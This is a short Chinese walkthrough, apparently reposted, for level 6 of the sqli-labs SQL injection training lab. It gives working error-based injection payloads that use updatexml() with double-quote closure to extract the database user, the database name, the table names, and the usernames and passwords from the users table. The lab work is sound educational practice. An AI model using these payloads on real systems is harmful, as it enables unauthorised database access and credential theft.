less6
这个本质上跟第五关相同都是使用报错注入,这一关使用的是双引号闭合
还是使用updatexml()这个函数
?id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
爆库名:
?id=1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
爆表名:
?id=1" union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' limit 0,1),0x7e),1) --+
爆用户名:
?id=1" union select updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) --+
爆密码:
?id=1" union select updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) --+
最后
以上就是安详网络最近收集整理的关于sqli-labs系列——第六关的全部内容,更多相关sqli-labs系列——第六关内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复